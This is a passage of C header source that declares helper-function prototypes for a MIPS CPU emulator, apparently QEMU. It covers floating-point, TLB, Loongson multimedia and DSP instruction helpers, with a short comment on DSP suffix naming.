tl, i32) #endif DEF_HELPER_2(fork, void, tl, tl) DEF_HELPER_2(yield, tl, env, tl) /* CP1 functions */ DEF_HELPER_2(cfc1, tl, env, i32) DEF_HELPER_4(ctc1, void, env, tl, i32, i32) DEF_HELPER_2(float_cvtd_s, i64, env, i32) DEF_HELPER_2(float_cvtd_w, i64, env, i32) DEF_HELPER_2(float_cvtd_l, i64, env, i64) DEF_HELPER_2(float_cvtps_pw, i64, env, i64) DEF_HELPER_2(float_cvtpw_ps, i64, env, i64) DEF_HELPER_2(float_cvts_d, i32, env, i64) DEF_HELPER_2(float_cvts_w, i32, env, i32) DEF_HELPER_2(float_cvts_l, i32, env, i64) DEF_HELPER_2(float_cvts_pl, i32, env, i32) DEF_HELPER_2(float_cvts_pu, i32, env, i32) DEF_HELPER_3(float_addr_ps, i64, env, i64, i64) DEF_HELPER_3(float_mulr_ps, i64, env, i64, i64) DEF_HELPER_FLAGS_2(float_class_s, TCG_CALL_NO_RWG_SE, i32, env, i32) DEF_HELPER_FLAGS_2(float_class_d, TCG_CALL_NO_RWG_SE, i64, env, i64) #define FOP_PROTO(op) \ DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) FOP_PROTO(maddf) FOP_PROTO(msubf) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) FOP_PROTO(max) FOP_PROTO(maxa) FOP_PROTO(min) FOP_PROTO(mina) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_2(float_ ## op ## _l_s, i64, env, i32) \ DEF_HELPER_2(float_ ## op ## _l_d, i64, env, i64) \ DEF_HELPER_2(float_ ## op ## _w_s, i32, env, i32) \ DEF_HELPER_2(float_ ## op ## _w_d, i32, env, i64) FOP_PROTO(cvt) FOP_PROTO(round) FOP_PROTO(trunc) 
FOP_PROTO(ceil) FOP_PROTO(floor) FOP_PROTO(cvt_2008) FOP_PROTO(round_2008) FOP_PROTO(trunc_2008) FOP_PROTO(ceil_2008) FOP_PROTO(floor_2008) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) FOP_PROTO(sqrt) FOP_PROTO(rsqrt) FOP_PROTO(recip) FOP_PROTO(rint) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_1(float_ ## op ## _s, i32, i32) \ DEF_HELPER_1(float_ ## op ## _d, i64, i64) \ DEF_HELPER_1(float_ ## op ## _ps, i64, i64) FOP_PROTO(abs) FOP_PROTO(chs) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) \ DEF_HELPER_2(float_ ## op ## _ps, i64, env, i64) FOP_PROTO(recip1) FOP_PROTO(rsqrt1) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) \ DEF_HELPER_3(float_ ## op ## _ps, i64, env, i64, i64) FOP_PROTO(add) FOP_PROTO(sub) FOP_PROTO(mul) FOP_PROTO(div) FOP_PROTO(recip2) FOP_PROTO(rsqrt2) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) \ DEF_HELPER_4(float_ ## op ## _ps, i64, env, i64, i64, i64) FOP_PROTO(madd) FOP_PROTO(msub) FOP_PROTO(nmadd) FOP_PROTO(nmsub) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_4(cmp_d_ ## op, void, env, i64, i64, int) \ DEF_HELPER_4(cmpabs_d_ ## op, void, env, i64, i64, int) \ DEF_HELPER_4(cmp_s_ ## op, void, env, i32, i32, int) \ DEF_HELPER_4(cmpabs_s_ ## op, void, env, i32, i32, int) \ DEF_HELPER_4(cmp_ps_ ## op, void, env, i64, i64, int) \ DEF_HELPER_4(cmpabs_ps_ ## op, void, env, i64, i64, int) FOP_PROTO(f) FOP_PROTO(un) FOP_PROTO(eq) FOP_PROTO(ueq) FOP_PROTO(olt) FOP_PROTO(ult) FOP_PROTO(ole) FOP_PROTO(ule) FOP_PROTO(sf) FOP_PROTO(ngle) FOP_PROTO(seq) FOP_PROTO(ngl) FOP_PROTO(lt) FOP_PROTO(nge) FOP_PROTO(le) FOP_PROTO(ngt) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_3(r6_cmp_d_ ## op, i64, env, i64, i64) \ DEF_HELPER_3(r6_cmp_s_ ## op, i32, env, i32, i32) FOP_PROTO(af) FOP_PROTO(un) FOP_PROTO(eq) FOP_PROTO(ueq) FOP_PROTO(lt) FOP_PROTO(ult) FOP_PROTO(le) FOP_PROTO(ule) FOP_PROTO(saf) FOP_PROTO(sun) FOP_PROTO(seq) FOP_PROTO(sueq) FOP_PROTO(slt) FOP_PROTO(sult) FOP_PROTO(sle) FOP_PROTO(sule) FOP_PROTO(or) FOP_PROTO(une) FOP_PROTO(ne) FOP_PROTO(sor) FOP_PROTO(sune) FOP_PROTO(sne) #undef FOP_PROTO /* Special functions */ DEF_HELPER_1(tlbwi, void, env) DEF_HELPER_1(tlbwr, void, env) DEF_HELPER_1(tlbp, void, env) DEF_HELPER_1(tlbr, void, env) DEF_HELPER_1(tlbinv, void, env) DEF_HELPER_1(tlbinvf, void, env) DEF_HELPER_1(di, tl, env) DEF_HELPER_1(ei, tl, env) DEF_HELPER_1(eret, void, env) DEF_HELPER_1(eretnc, void, env) DEF_HELPER_1(deret, void, env) DEF_HELPER_3(ginvt, void, env, tl, i32) DEF_HELPER_1(rdhwr_cpunum, tl, env) DEF_HELPER_1(rdhwr_synci_step, tl, env) DEF_HELPER_1(rdhwr_cc, tl, env) DEF_HELPER_1(rdhwr_ccres, tl, env) DEF_HELPER_1(rdhwr_performance, tl, env) DEF_HELPER_1(rdhwr_xnp, tl, env) DEF_HELPER_2(pmon, void, env, int) DEF_HELPER_1(wait, void, env) /* Loongson multimedia functions. 
*/ DEF_HELPER_FLAGS_2(paddsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddush, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubush, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pshufh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(packsswh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(packsshb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(packushb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpcklhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpckhhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpcklbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpckhbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpcklwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpckhwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pavgh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pavgb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmaxsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pminsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmaxub, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pminub, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpeqw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpgtw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpeqh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpgth, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpeqb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpgtb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psllw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psllh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psrlw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psrlh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psraw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psrah, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmullh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmulhh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmulhuh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmaddhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pasubub, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_1(biadd, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(pmovmskb, TCG_CALL_NO_RWG_SE, i64, i64) /*** MIPS DSP ***/ /* DSP Arithmetic Sub-class insns */ DEF_HELPER_FLAGS_3(addq_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addq_s_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(addq_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addq_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(addq_s_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(addq_pw, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addq_s_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(addu_qb, 0, 
tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(adduh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(adduh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(addu_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(addqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(addqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(addqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(addqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(addu_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(adduh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(adduh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(addu_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(subq_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subq_s_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(subq_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subq_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(subq_s_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(subq_pw, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subq_s_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(subu_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(subuh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subuh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(subu_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(subqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(subu_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(subuh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subuh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(subu_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(addsc, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addwc, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(modsub, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_1(raddu_w_qb, TCG_CALL_NO_RWG_SE, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_1(raddu_l_ob, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_2(absq_s_qb, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_ph, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_w, 0, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(absq_s_ob, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_qh, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_pw, 0, tl, tl, env) #endif DEF_HELPER_FLAGS_2(precr_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(precrq_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precr_sra_ph_w, TCG_CALL_NO_RWG_SE, tl, i32, tl, tl) DEF_HELPER_FLAGS_3(precr_sra_r_ph_w, TCG_CALL_NO_RWG_SE, tl, i32, tl, tl) DEF_HELPER_FLAGS_2(precrq_ph_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precrq_rs_ph_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(precr_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precr_sra_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) DEF_HELPER_FLAGS_3(precr_sra_r_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) DEF_HELPER_FLAGS_2(precrq_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) 
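/*
 * Suffix key for the DSP ASE helpers in this section: _qb = quad byte
 * and _ph = paired halfword (32-bit vectors), _w = word; the MIPS64
 * counterparts are _ob (octal byte), _qh (quad halfword) and _pw
 * (paired word).  An infix _s_ marks a saturating variant and _r_ a
 * rounding one, so e.g. subu_s_qb is "subtract unsigned with
 * saturation, quad byte".
 */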
DEF_HELPER_FLAGS_2(precrq_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precrq_rs_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl, env) DEF_HELPER_FLAGS_2(precrq_pw_l, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif DEF_HELPER_FLAGS_3(precrqu_s_qb_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(precrqu_s_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl, env) DEF_HELPER_FLAGS_1(preceq_pw_qhl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceq_pw_qhr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceq_pw_qhla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceq_pw_qhra, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_1(precequ_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_1(precequ_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_1(preceu_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_1(preceu_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) #endif /* DSP GPR-Based Shift Sub-class insns */ DEF_HELPER_FLAGS_3(shll_qb, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(shll_ob, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(shll_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(shll_s_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(shll_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(shll_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(shll_s_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(shll_pw, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(shll_s_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_2(shrl_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(shrl_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shrl_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif DEF_HELPER_FLAGS_2(shra_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(shra_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif DEF_HELPER_FLAGS_2(shra_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(shra_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif /* DSP Multiply Sub-class insns */ DEF_HELPER_FLAGS_3(muleu_s_ph_qbl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleu_s_ph_qbr, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(muleu_s_qh_obl, 0, tl, tl, tl, env) 
DEF_HELPER_FLAGS_3(muleu_s_qh_obr, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(mulq_rs_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(mulq_rs_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(muleq_s_w_phl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleq_s_w_phr, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(muleq_s_pw_qhl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleq_s_pw_qhr, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_4(dpau_h_qbl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpau_h_qbr, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpau_h_obl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dpau_h_obr, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsu_h_qbl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpsu_h_qbr, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpsu_h_obl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dpsu_h_obr, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpa_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpa_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpax_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpaq_s_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpaq_s_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpaqx_s_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpaqx_sa_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dps_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dps_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsx_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpsq_s_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpsq_s_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsqx_s_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpsqx_sa_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(mulsaq_s_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(mulsaq_s_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpaq_sa_l_w, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpaq_sa_l_pw, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsq_sa_l_w, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpsq_sa_l_pw, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(mulsaq_s_l_pw, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(maq_s_w_phl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(maq_s_w_phr, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(maq_sa_w_phl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(maq_sa_w_phr, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_3(mul_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mul_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mulq_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mulq_s_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mulq_rs_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_4(mulsa_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(maq_s_w_qhll, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_w_qhlr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_w_qhrl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_w_qhrr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhll, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhlr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhrl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhrr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_l_pwl, 0, void, tl, 
tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_l_pwr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmadd, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmaddu, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmsub, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmsubu, 0, void, tl, tl, i32, env) #endif /* DSP Bit/Manipulation Sub-class insns */ DEF_HELPER_FLAGS_1(bitrev, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_3(insv, 0, tl, env, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dinsv, 0, tl, env, tl, tl) #endif /* DSP Compare-Pick Sub-class insns */ DEF_HELPER_FLAGS_3(cmpu_eq_qb, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_lt_qb, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_le_qb, 0, void, tl, tl, env) DEF_HELPER_FLAGS_2(cmpgu_eq_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_lt_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) 